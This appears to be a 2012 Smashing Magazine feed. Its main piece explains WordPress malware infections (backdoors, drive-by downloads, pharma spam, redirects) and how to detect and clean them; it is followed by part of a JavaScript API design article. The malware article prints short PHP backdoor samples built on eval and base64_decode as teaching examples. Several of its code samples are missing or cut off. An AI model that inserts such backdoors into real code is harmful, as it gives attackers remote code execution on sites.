    The secret sauce of lean startup people is that they advocate for user experience research and design as one of the primary solutions to their business problems, and they do it using plain language. I highly encourage UX practitioners to closely monitor the developments and thought-leadership in the lean startup world to see how they can use what they learn in their own organizations, “lean” or not.

    Learn More About The Lean Startup Movement



    Illustrations by Calvin C. Chan, (@calvincchan), UX designer, Hong Kong.


    © Tomer Sharon for Smashing Magazine, 2012.

  • Security: Common WordPress Malware Infections


    WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

    WordPress Security

    In WordPress’ core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

    The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please notice that some anti-virus apps report this article as malware, probably because it contains examples of the code that should be avoided. This article does not contain any malware itself, so the alert must be based on heuristic analysis.

    Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

    A Bit About Our Security Expert: Meet Tony

    Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

    I asked Tony how he got into Web security:


    “I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

    That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

    Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

    What Makes WordPress Vulnerable?

    Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

    Let’s break that down.

    The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

    Vulnerabilities in plugins and themes is another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

    Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

    Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

    “For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once its built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

    WordPress’ ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

    From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

    • Out of date software,
    • Poor credential management,
    • Poor system administration,
    • Soup-kitchen servers,
    • Lack of Web knowledge,
    • Corner-cutting.

    A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

    The Evolution Of Attacks

    As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday” attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

    Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identify theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

    Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

    Common WordPress Malware Issues

    Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:


    A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

    backdoor gui screenshot
    A backdoor GUI. Click the image for the whole picture!

    Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

    How am I attacked?

    The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

    Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:


    What does it look like?

    Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:


    Another example:


    Below is a case where the content is hidden in the database and targets WordPress installations:

    return @eval(get_option(’blogopt1’));

    And here is a very simple backdoor that allows any PHP request to execute:

    eval (base64_decode($_POST["php"]));

    Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:


    Here is another backdoor that commonly affects WordPress installations, the Filesman:


    How can I tell whether I’m infected?

    Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

    • wtf.php
    • wphap.php
    • php5.php
    • data.php
    • 1.php
    • p.php

    In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:


    Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

    How do I prevent it?

    While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

    1. Prevent access.
      Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:

      • Block IPs,
      • Two-factor authentication,
      • Limited access by default.

      This will make it extremely difficult for anyone except you to access your website.

    2. Kill PHP execution.
      Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesn’t exist, create it.
    <FilesMatch *.php>
    Order Deny, Allow
    Deny from All

    How is it cleaned?

    Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:


    If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

    # grep -ri "eval" [path]

    Or for this:

    # grep -ri "base64_decode" [path]

    The r ensures that all files are scanned, while the i ensures that the scan is case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

    Look for recently modified files:

    find -type f -ctime -0 | more

    The -type looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

    Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

    # diff -r /[path]/[directory] /[path]/[directory] | sort

    The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything you find that is in the live website’s directory but not in the backup directory warrants a second look.

    Drive-By Downloads

    A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

    The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

    How does the attack get in?

    There are a number of ways an attack can get in. The most common causes are:

    • Out of date software,
    • Compromised credentials (wp-admin, FTP),
    • SQL injection.

    What does it look like?

    Below are a number of examples of link injections that lead to some type of drive-by download attack:


    And this:


    And this:


    More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.”

    How can I tell whether I’m infected?

    Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

    Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:


    The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

    • wp_blog_header.php (core file)
    • index.php (core file)
    • index.php (theme file)
    • function.php (theme file)
    • header.php (theme file)
    • footer.php (theme file)

    About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

    Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

    How is it cleaned?

    Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

    If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

    • CURL
      Used to transfer data with a URL syntax.
    • FIND
      Search by file or directory name.
    • GREP
      Search for content in files.

    For example, to search all of your files for a particular section of the injection, try something like this:

    $ grep -r "" .

    Including the following characters is important:

    • "
      Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
    • -r
      Means “recursive” and will traverse all directories and files.

    You can also refine your search by file type:

    $ grep --include ".php" -r "" .

    Enabling the --include option allows you to specify file type; in this instance, only PHP files.

    These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

    Pharma Hack

    Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.” If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

    This site may be compromised!!

    This is what it will look like on Google’s search engine results page (SERP):

    How am I attacked?

    The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:


    Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:


    Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

    This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis” or “Viagra,” although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

    What does it look like?

    Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

    Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

    Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

    screenshot of a blog's tags with pharma hack tags

    Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,” “About” or “Contact”), it redirects the user to a completely different page. Somewhere like this:

    How do I tell whether I’m infected?

    Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

    The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

    You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

    How is it cleaned?

    First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

    When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

    # egrep -wr 'viagra|pharmacy' .

    By using egrep, we’re able to search multiple words at the same time if necessary, thus saving you time in this instance.

    Or try something like this:

    # grep -r "" .

    This only works if the infection is not encoded, encrypted or concatenated.

    Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

    Try Bots vs Browsers to check your website through a number of different browsers.

    Terminal users can also use CURL:

    # curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

    How do I prevent it?

    Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

    Here is an example of what you might be looking for if you can’t find the infection in your own installation:


    To prevent a pharma hack, you should do two things:

    1. Keep your software up to date,
    2. Steer clear of soup-kitchen servers.

    Malicious Redirects

    A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

    When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at; when someone visits it, the website could take the visitor to, where the malicious payload is in that website’s stats.php file. Or it could be a harmless website with just ads and no malicious payload.

    How am I attacked?

    As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

    What does it look like?

    Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:


    Or like this:


    There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:


    How do I tell if I am infected?

    There are a few ways to check for infections. Here are some suggestions:

    • Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
    • Test using Bots vs Browser.
    • Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

    If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

    • What operating system are they using?
    • What browser(s) are they using, and which version(s)?

    The more information you get from them, the better you can replicate the issue and find a fix.

    How is it cleaned?

    Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

    1. Open your .htaccess file.
    2. Copy any rewrite rules that you have added yourself
    3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

    Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

    # find [path] -name .htaccess -type f | wc -l

    And this will tell you where exactly those files are:

    # find [path] -name .htaccess -type f | sort

    The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

    Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson is always look outside of your Web directory as well as within it.

    How do I prevent it?

    A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

    The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccess” for tips on doing that.


    There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

    Tony’s Top Ten Security Tips

    1. Get rid of generic accounts, and know who is accessing your environment.
    2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
    3. Keep a backup; you never know when you’ll need it.
    4. Connect securely to your server. SFTP and SSH is preferred.
    5. Avoid soup-kitchen servers. Segment between development, staging and production.
    6. Stay current with your software — all of it.
    7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
    8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
    9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
    10. IP filtering + Two-factor authentication + Strong credentials = Secure access

    Tony’s Most Useful Security Plugins

    • Sucuri Sitecheck Malware Scanner
      This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
    • Login Lock
      This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
    • Two-Factor Authentication
      This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
    • Theme-Check
      Test your theme to make sure it’s up to spec with theme review standards.
    • Plugin-Check
      Does what Theme-Check does but for plugins.

    Security Tools

    Security Resources

    Useful Security Articles


    © Siobhan McKeown for Smashing Magazine, 2012.

  • Designing Better JavaScript APIs


    At some point or another, you will find yourself writing JavaScript code that exceeds the couple of lines from a jQuery plugin. Your code will do a whole lot of things; it will (ideally) be used by many people who will approach your code differently. They have different needs, knowledge and expectations.

    This article covers the most important things that you will need to consider before and while writing your own utilities and libraries. We’ll focus on how to make your code accessible to other developers. A couple of topics will be touching upon jQuery for demonstration, yet this article is neither about jQuery nor about writing plugins for it.

    “The computer is a moron.”
    — Peter Drucker

    Don’t write code for morons, write for humans! Let’s dive into designing the APIs that developers will love using.

    Time Spent On Creating Vs Time Spent On Using

    Fluent Interface

    The Fluent Interface is often referred to as Method Chaining (although that’s only half the truth). To beginners it looks like the jQuery style. While I believe the API style was a key ingredient in jQuery’s success, it wasn’t invented by them — credits seem to go to Martin Fowler who coined the term back in 2005, roughly a year before jQuery was released. Fowler only gave the thing a name, though — Fluent Interfaces have been around for a much longer time.

    Aside from major simplifications, jQuery offered to even out severe browser differences. It has always been the Fluent Interface that I have loved most about this extremely successful library. I have come to enjoy this particular API style so much that it became immediately apparent that I wanted this style for URI.js, as well. While tuning up the URI.js API, I constantly looked through the jQuery source to find the little tricks that would make my implementation as simple as possible. I found out that I was not alone in this endeavor. Lea Verou created chainvas — a tool to wrap regular getter/setter APIs into sweet fluent interfaces. Underscore’s _.chain() does something similar. In fact, most of the newer generation libraries support method chaining.

    Method Chaining

    The general idea of Method Chaining is to achieve code that is as fluently readable as possible and thus quicker to understand. With Method Chaining we can form code into sentence-like sequences, making code easy to read, while reducing noise in the process:

    // regular API calls to change some colors and add an event-listener
    var elem = document.getElementById("foobar"); = "red"; = "green";
    elem.addEventListener('click', function(event) {
      alert("hello world!");
    }, true);
    // (imaginary) method chaining API
      .setStyle("background", "red")
      .setStyle("color", "green")
      .addEvent("click", function(event) {
        alert("hello world");

    Note how we didn’t have to assign the element’s reference to a variable and repeat that over and over again.

    Command Query Separation

    Command and Query Separation (CQS) is a concept inherited from imperative programming. Functions that change the state (internal values) of an object are called commands, functions that retrieve values are called queries. In principle, queries return data, commands change the state — but neither does both. This concept is one of the foundations of the everyday getter and setter methods we see in most libraries today. Since Fluent Interfaces return a self-reference for chaining method calls, we’re already breaking the rule for commands, as they are not supposed to return anything. On top of this (easy to ignore) trait, we (deliberately) break with this concept to keep APIs as simple as possible. An excellent example for this practice is jQuery’s css() method:

    var $elem = jQuery("#foobar");
    // CQS - command
    $elem.setCss("background", "green");
    // CQS - query
    $elem.getCss("color") === "red";
    // non-CQS - command
    $elem.css("background", "green");
    // non-CQS - query
    $elem.css("color") === "red";

    As you can see, getter and setter methods are merged into a single method. The action to perform (namely, query or command) is decided by the amount of arguments passed to the function, rather than by which function was called. This allows us to expose fewer methods and in turn type less to achieve the same goal.

    It is not necessary to compress getters and setters into a single method in order to create a fluid interface — it boils down to personal preference. Your documentation should be very clear with the approach you’ve decided on. I will get into documenting APIs later, but at this point I would like to note that multiple function signatures may be harder to document.

    Going Fluent

    While method chaining already does most of the job for going fluent, you’re not off the hook yet. To illustrate the next step of fluent, we’re pretending to write a little library handling date intervals. An interval starts with a date and ends with a date. A date is not necessarily connected to an interval. So we come up with this simple constructor:

    // create new date interval
    var interval = new DateInterval(startDate, endDate);
    // get the calculated number of days the interval spans
    var days = interval.days();

    While this looks right at first glance, this example shows what’s wrong:

    var startDate = new Date(2012, 0, 1);
    var endDate = new Date(2012, 11, 31)
    var interval = new DateInterval(startDate, endDate);
    var days = interval.days(); // 365

    We’re writing out a whole bunch of variables and stuff we probably won’t need. A nice solution to the problem would be to add a function to the Date object in order to return an interval:

    // DateInterval creator for fluent invocation
    Date.prototype.until = function(end) {
      // if we weren't given a date, make one
      if (!(end instanceof Date)) {
        // create date from given arguments,
        // proxy the constructor to allow for any parameters
        // the Date constructor would've taken natively
        end = Date.apply(null, 
, 0)
      return new DateInterval(this, end);

    Now we can create that DateInterval in a fluent, easy to type-and-read fashion:

    var startDate = new Date(2012, 0, 1);
    var interval = startDate.until(2012, 11, 31);
    var days = interval.days(); // 365
    // condensed fluent interface call:
    var days = (new Date(2012, 0, 1))
      .until(2012, 11, 31) // returns DateInterval instance
      .days(); // 365

    As you can see in this last example, there are less variables to declare, less code to write, and the operation almost reads like an english sentence. With this example you should have realized that method chaining is only a part of a fluent interface, and as such, the terms are not synonymous. To provide fluency, you have to think about code streams — where are you coming from and where you are headed.

    This example illustrated fluidity by extending a native object with a custom function. This is as much a religion as using semicolons or not. In Extending built-in native objects. Evil or not? kangax explains the ups and downs of this approach. While everyone has their opinions about this, the one thing everybody agrees on is keeping things consistent. As an aside, even the followers of “Don’t pollute native objects with custom functions” would probably let the following, still somewhat fluid trick slide: = function() {
      return new Foo(this);
    "I'm a native object".foo()

    With this approach your functions are still within your namespace, but made accessible through another object. Make sure your equivalent of .foo() is a non-generic term, something highly unlikely to collide with other APIs. Make sure you provide proper .valueOf() and .toString() methods to convert back to the original primitive types.


    Jake Archibald once had a slide defining Consistency. It simply read Not PHP. Do. Not. Ever. Find yourself naming functions like str_repeat(), strpos(), substr(). Also, don’t ever shuffle around positions of arguments. If you declared find_in_array(haystack, needle) at some point, introducing findInString(needle, haystack) will invite an angry mob of zombies to rise from their graves to hunt you down and force you to write delphi for the rest of your life!

    Naming Things

    “There are only two hard problems in computer science: cache-invalidation and naming things.”
    — Phil Karlton

    I’ve been to numerous talks and sessions trying to teach me the finer points of naming things. I haven’t left any of them without having heard the above said quote, nor having learnt how to actually name things. My advice boils down to keep it short but descriptive and go with your gut. But most of all, keep it consistent.

    The DateInterval example above introduced a method called until(). We could have named that function interval(). The latter would have been closer to the returned value, while the former is more humanly readable. Find a line of wording you like and stick with it. Consistency is 90% of what matters. Choose one style and keep that style — even if you find yourself disliking it at some point in the future.

    Handling Arguments

    Good Intentions

    How your methods accept data is more important than making them chainable. While method chaining is a pretty generic thing that you can easily make your code do, handling arguments is not. You’ll need to think about how the methods you provide are most likely going to be used. Is code that uses your API likely to repeat certain function calls? Why are these calls repeated? How could your API help the developer to reduce the noise of repeating method calls?

    jQuery’s css() method can set styles on a DOM element:

      .css("background", "red")
      .css("color", "white")
      .css("font-weight", "bold")
      .css("padding", 10);

    There’s a pattern here! Every method invocation is naming a style and specifying a value for it. This calls for having the method accept a map:

      "background" : "red",
      "color" : "white",
      "font-weight" : "bold",
      "padding" : 10

    jQuery’s on() method can register event handlers. Like css() it accepts a map of events, but takes things even further by allowing a single handler to be registered for multiple events:

    // binding events by passing a map
      "click" : myClickHandler,
      "keyup" : myKeyupHandler,
      "change" : myChangeHandler
    // binding a handler to multiple events:
    jQuery("#some-selector").on("click keyup change", myEventHandler);

    You can offer the above function signatures by using the following method pattern:

    DateInterval.prototype.values = function(name, value) {
      var map;
      if (jQuery.isPlainObject(name)) {
        // setting a map
        map = name;
      } else if (value !== undefined) {
        // setting a value (on possibly multiple names), convert to map
        keys = name.split(" ");
        map = {};
        for (var i = 0, length = keys.length; i < length; i++) {
          map[keys[i]] = value;
      } else if (name === undefined) {
        // getting all values
        return this.values;
      } else {
        // getting specific value
        return this.values[name];
      for (var key in map) {
        this.values[name] = map[key];
      return this;

    If you are working with collections, think about what you can do to reduce the number of loops an API user would probably have to make. Say we had a number of <input> elements for which we want to set the default value:

    <input type="text" value="" data-default="foo">
    <input type="text" value="" data-default="bar">
    <input type="text" value="" data-default="baz">

    We’d probably go about this with a loop:

    jQuery("input").each(function() {
      var $this = jQuery(this);

    What if we could bypass that method with a simple callback that gets applied to each <input> in the collection? jQuery developers have thought of that and allow us to write less™:

    jQuery("input").val(function() {
      return jQuery(this).data("default");

    It’s the little things like accepting maps, callbacks or serialized attribute names, that make using your API not only cleaner, but more comfortable and efficient to use. Obviously not all of your APIs’ methods will benefit from this method pattern — it’s up to you to decide where all this makes sense and where it is just a waste of time. Try to be as consistent about this as humanly possible. Reduce the need for boilerplate code with the tricks shown above and people will invite you over for a drink.

    Handling Types

    Whenever you define a function that will accept arguments, you decide what data that function accepts. A function to calculate the number of days between two dates could look like:

    DateInterval.prototype.days = function(start, end) {
      return Math.floor((end - start) / 86400000);

    As you can see, the function expects numeric input — a millisecond timestamp, to be exact. While the function does what we intended it to do, it is not very versatile. What if we’re working with Date objects or a string representation of a date? Is the user of this function supposed to cast data all the time? No! Simply verifying the input and casting it to whatever we need it to be should be done in a central place, not cluttered throughout the code using our API:

    DateInterval.prototype.days = function(start, end) {
      if (!(start instanceof Date)) {
        start = new Date(start);
      if (!(end instanceof Date)) {
        end = new Date(end);
      return Math.floor((end.getTime() - start.getTime()) / 86400000);

    By adding these six lines we’ve given the function the power to accept a Date object, a numeric timestamp, or even a string representation like Sat Sep 08 2012 15:34:35 GMT+0200 (CEST). We do not know how and for what people are going to use our code, but with a little foresight, we can make sure there is little pain with integrating our code.

    The experienced developer can spot another problem in the example code. We’re assuming start comes before end. If the API user accidentally swapped the dates, he’d be given a negative value for the number of days between start and end. Stop and think about these situations carefully. If you’ve come to the conclusion that a negative value doesn’t make sense, fix it:

    DateInterval.prototype.days = function(start, end) {
      if (!(start instanceof Date)) {
        start = new Date(start);
      if (!(end instanceof Date)) {
        end = new Date(end);
      return Math.abs(Math.floor((end.getTime() - start.getTime()) / 86400000));

    JavaScript allows type casting a number of ways. If you’re dealing with primitives (string, number, boolean) it can get as simple (as in “short”) as:

    function castaway(some_string, some_integer, some_boolean) {
      some_string += "";
      some_integer += 0; // parseInt(some_integer, 10) is the safer bet
      some_boolean = !!some_boolean;

    I’m not advocating you to do this everywhere and at all times. But these innocent looking lines may save time and some suffering while integrating your code.

    Treating undefined as an Expected Value

    There will come a time when undefined is a value that your API actually expects to be given for setting an attribute. This might happen to “unset” an attribute, or simply to gracefully handle bad input, making your API more robust. To identify if the value undefined has actually been passed by your method, you can check the arguments object:

    function testUndefined(expecting, someArgument) {
      if (someArgument === undefined) {
        console.log("someArgument was undefined");
      if (arguments.length > 1) {
        console.log("but was actually passed in");
    // prints: someArgument was undefined
    testUndefined("foo", undefined);
    // prints: someArgument was undefined, but was actually passed in

    Named Arguments

      "click", true, true, window, 
      123, 101, 202, 101, 202, 
      true, false, false, false, 
      1, null);

    The function signature of Event.initMouseEvent is a nightmare come true. There is no chance any developer will remember what that 1 (second to last parameter) means without looking it up in the documentation. No matter how good your documentation is, do what you can so people don’t have to look things up!

    How Others Do It

    Looking beyond our beloved language, we find Python knowing a concept called named arguments. It allows you to declare a function providing default values for arguments, allowing your attributed names to be stated in the calling context:

    function namesAreAwesome(foo=1, bar=2) {
      console.log(foo, bar);
    // prints: 1, 2
    namesAreAwesome(3, 4);
    // prints: 3, 4
    namesAreAwesome(foo=5, bar=6);
    // prints: 5, 6
    // prints: 1, 6

    Given this scheme, initMouseEvent() could’ve looked like a self-explaining function call:


    In JavaScript this is not possible today. While “the next version of JavaScript” (frequently called, ES6, or Harmony) will have default parameter values and rest parameters, there is still no sign of named parameters.

    Argument Maps

